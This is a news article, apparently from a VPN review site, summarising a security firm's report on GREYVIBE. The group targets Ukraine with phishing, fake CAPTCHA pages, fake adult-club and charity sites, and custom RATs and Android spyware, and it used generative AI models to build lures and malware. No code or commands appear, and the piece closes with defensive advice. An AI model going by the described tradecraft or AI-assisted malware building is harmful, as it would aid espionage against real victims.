GREYVIBE Hackers Use ChatGPT and Google Gemini to Support Cyberattacks on Ukraine
9 min. read 
Published on
WithSecure has identified a previously untracked threat group called GREYVIBE that has used generative AI tools across cyber operations targeting Ukraine and Ukraine-related entities. The WithSecure GREYVIBE report says the activity has been ongoing since at least August 2025 and includes targets in military, government, civilian, and business-related sectors.
The group has used spear-phishing emails, fake CAPTCHA pages, fraudulent adult-club websites, and fake charity lures to deliver custom malware. WithSecure says the operations align with Russian state interests, particularly intelligence-gathering tied to the war in Ukraine, but the researchers did not make a definitive state attribution.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The most important finding is GREYVIBE’s systematic use of AI tools, including ChatGPT, Google Gemini, and Ideogram AI. Researchers found signs of AI use in phishing content, lure development, image generation, malware development, obfuscators, backend setup, and post-compromise activity.
What GREYVIBE Is
GREYVIBE is a Russia-nexus threat group tracked by WithSecure after researchers linked several campaigns through shared infrastructure, malware, development behavior, and operational patterns. The group has not been definitively tied to a previously tracked actor.
WithSecure says the operators appear to be Russian-speaking and broadly active in the Moscow time zone. The activity also shows signs of overlap with the cybercrime ecosystem, including tooling and infrastructure patterns that do not look like a clean, mature state-only operation.
This mixed profile is important. GREYVIBE appears to sit between cybercrime and state-aligned activity, which makes attribution harder and shows how modern threat groups can combine espionage goals with criminal tooling habits.
| Area | What researchers observed |
|---|---|
| Primary target region | Ukraine and Ukraine-related entities |
| Active since | At least August 2025 |
| Likely operator language | Russian |
| Observed time zone pattern | Moscow time zone activity |
| AI tools referenced | ChatGPT, Google Gemini, Ideogram AI |
| Main malware families | PhantomRelay, FallSpy, LegionRelay |
How GREYVIBE Uses AI in Its Operations
GREYVIBE does not appear to use AI only for isolated tasks. WithSecure says the group shows strong indicators of AI use across several phases of the attack lifecycle.
The group appears to use AI to create lures, build fake websites, generate images, write or refactor malware components, create loaders and obfuscators, and generate post-compromise scripts. This gives a lower-skilled or mid-skilled group the ability to move faster and refresh its tooling more often.
OpenAI has described this broader pattern in its malicious AI use report, noting that threat actors often combine AI models with websites, social platforms, and traditional tooling rather than using AI as a standalone attack system.
Phishing and Fake CAPTCHA Pages Delivered Malware
One GREYVIBE campaign, tracked as PhantomMail, used spear-phishing emails that impersonated Ukrainian organizations and officials. The emails linked to malicious ZIP or RAR archives hosted on third-party file-sharing services, including Google Drive and 4sync.
Those archives launched decoy documents while silently starting the PhantomRelay infection chain. The decoys helped the lure feel credible while the malware executed in the background.
The group also experimented with fake CAPTCHA pages in a campaign tracked as PhantomClick. Victims were told to run commands as part of a fake verification step, while those commands triggered PhantomRelay delivery.
| Campaign | Delivery method | Likely goal |
|---|---|---|
| PhantomMail | Spear-phishing emails with cloud-hosted archives | Deliver PhantomRelay through decoy documents |
| PhantomClick | Fake CAPTCHA pages with command prompts | Trick victims into launching malware |
| PrincessClub | Fake Ukrainian adult-club websites | Deliver FallSpy on Android and RATs on Windows |
| DroneLink | Fake charity sites for military drone support | Deliver malware and post-compromise tools |
Fake Adult-Club Sites Targeted Ukrainian Victims
GREYVIBE’s PrincessClub campaign used fake Ukrainian adult-club websites to target individuals, including Ukrainian combatants. The sites delivered FallSpy on Android and PhantomRelay or LegionRelay on Windows.
The group also used fake personas on Telegram and local dating channels to build trust before directing victims to lure sites or delivering malware. Later versions of the sites included a WebRTC-based live call feature that could capture audio and video after infection.
The WithSecure analysis says this activity was not limited to simple malware delivery. Some lures appeared designed to support surveillance and intelligence collection after the initial compromise.
GREYVIBE’s Malware Toolkit
GREYVIBE relies on a small set of custom malware, loaders, and obfuscators. PhantomRelay is a PowerShell-based remote access trojan that communicates over WebSockets and can run PowerShell scripts or Windows commands sent by the operator.
FallSpy is Android spyware that can collect contacts, call logs, installed applications, phone numbers linked to SIM cards, device details, Wi-Fi SSID, last-known location, public IP address, and media files. Its deployment context suggests surveillance and intelligence-gathering goals.
LegionRelay is a lightweight PowerShell RAT that communicates through REST API methods. WithSecure observed operators using it for file enumeration, file exfiltration, screenshots, browser data theft, messaging data theft, and RDP access setup.
| Tool | Type | Reported capability |
|---|---|---|
| PhantomRelay | Windows PowerShell RAT | Command execution and modular post-compromise scripts |
| FallSpy | Android spyware | Device, location, contacts, media, and call-log theft |
| LegionRelay | PowerShell RAT | File theft, screenshots, browser data theft, and messaging data theft |
| DAYLIGHT | PowerShell obfuscator | Payload obfuscation and malware delivery support |
| TEASOUP | JavaScript obfuscator | Loader and script obfuscation |
AI Helped the Group Move Faster, but Also Created Mistakes
WithSecure assesses that GREYVIBE uses AI to bridge technical gaps, accelerate development, and reduce reliance on old code patterns that might make attribution easier. That gives the group more operational speed than its raw skill level might suggest.
The same reliance on AI also appears to have created weaknesses. WithSecure found design flaws in LegionRelay, which the researchers assess was likely developed with LLM assistance. Those flaws exposed limited backend functionality and gave researchers visibility into attacker activity over time.
This fits a wider trend. The Google Threat Intelligence Group report on AI misuse said APT actors have used Gemini to support multiple phases of the attack lifecycle, including reconnaissance and target development.
GREYVIBE Shows the New Reality of AI-Enabled Threats
GREYVIBE does not show that AI has replaced human operators. Instead, it shows how AI can make existing attack methods faster, cheaper, and more varied.
Threat actors can ask AI systems to draft phishing lures, translate content, improve scripts, refactor code, generate images, and help troubleshoot malware infrastructure. This does not automatically make them elite, but it can raise the floor for what less mature operators can achieve.
OpenAI’s February 2026 threat report makes a similar point: threat activity is rarely limited to one platform, and actors may use different AI models at different points in their workflow.
Attribution Remains Complicated
WithSecure says GREYVIBE activity aligns strongly with Russian state interests, especially intelligence collection related to Ukraine. However, several indicators suggest the group may have ties to the broader cybercrime ecosystem.
Those indicators include tool overlap with cybercrime clusters, test samples uploaded to public platforms, and signs of immature operational security. The group appears persistent and ambitious, but not as polished as top-tier state operators.
That blend creates a difficult attribution problem. A group can serve state-aligned objectives, reuse criminal infrastructure, adopt AI-generated tooling, and still make mistakes that do not fit traditional state actor profiles.
Defensive Takeaways for Security Teams
Organizations supporting Ukraine, working with Ukrainian institutions, or operating in related sectors should treat GREYVIBE-style campaigns as a realistic threat. The group’s lures are tailored, and its use of AI may make future messages and fake sites more convincing.
The Google Threat Intelligence May 2026 report warned that adversaries are moving from early AI experimentation toward more industrial-scale use of generative models in cyber operations. That makes defensive detection harder when attackers can refresh text, code, and infrastructure faster.
- Train users to treat fake CAPTCHA command prompts as malware delivery attempts.
- Block suspicious archive downloads from untrusted cloud-sharing links.
- Hunt for PhantomRelay, FallSpy, LegionRelay, DAYLIGHT, and TEASOUP indicators.
- Review Telegram-based social engineering against high-risk staff.
- Monitor for PowerShell RAT behavior, WebSocket C2, and unusual REST API traffic.
- Inspect Android devices used by high-risk users for spyware indicators.
- Track AI-style lure reuse, generated images, and rapid variation across domains.
Why Traditional Detection Gets Harder
Traditional threat tracking often depends on repeated code patterns, stable infrastructure, reused phishing templates, and familiar malware families. AI-assisted development can reduce those stable signals by helping operators rewrite, refactor, and regenerate components more often.
This does not make attackers invisible. It means defenders need more behavioral detection, stronger identity monitoring, better endpoint visibility, and campaign-level analysis that connects infrastructure, victimology, timing, and operator behavior.
The Google February 2026 AI threat tracker also noted that AI can speed up target research and phishing preparation, which directly affects defenders who rely only on known templates and static indicators.
How Organizations Can Prepare
Security teams should update awareness training to include AI-generated lures, fake verification pages, and dating or charity-themed social engineering. Users should never copy and paste commands from a website into Run, PowerShell, Terminal, or a browser console unless they fully trust the source and understand the command.
Incident responders should also preserve telemetry from endpoints, mobile devices, messaging platforms, and DNS logs. GREYVIBE campaigns cross email, web, Telegram, Android, Windows, and cloud-hosted files, so single-channel investigation can miss parts of the attack.
The Google May 2026 AI threat update reinforces the need to monitor how adversaries use AI for operations at scale, while defenders use the same class of tools to triage, correlate, and respond faster.
The Bottom Line
GREYVIBE shows how generative AI is changing cyber operations without replacing traditional tradecraft. The group still uses phishing, fake websites, malware, social engineering, and command-and-control infrastructure, but AI helps it move faster and vary its tools.
The strongest defense is not one signature or one blocklist. Organizations need layered controls that cover user training, endpoint detection, mobile security, cloud file abuse, PowerShell behavior, and threat hunting across multiple channels.
FAQ
GREYVIBE is a threat group tracked by WithSecure. It targets Ukraine and Ukraine-related entities and shows Russia-nexus indicators, including Russian-language artifacts, Moscow time zone activity patterns, and targeting aligned with Russian state interests.
WithSecure found indicators that GREYVIBE used generative AI tools such as ChatGPT, Google Gemini, and Ideogram AI to support lure creation, fake website development, malware components, obfuscators, infrastructure setup, and post-compromise scripts.
WithSecure links GREYVIBE activity to PhantomRelay, FallSpy, and LegionRelay. PhantomRelay and LegionRelay are Windows-focused remote access tools, while FallSpy is Android spyware used for surveillance and data theft.
WithSecure says GREYVIBE activity aligns with Russian state interests and shows Russian-speaking operator indicators, but it has not made a definitive state attribution. The group also shows signs of ties to the broader cybercrime ecosystem.
Defenders should monitor spear-phishing, fake CAPTCHA commands, Telegram-based social engineering, suspicious cloud-hosted archives, PowerShell RAT behavior, Android spyware indicators, and AI-generated lure patterns. High-risk users should receive focused training and stronger endpoint monitoring.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages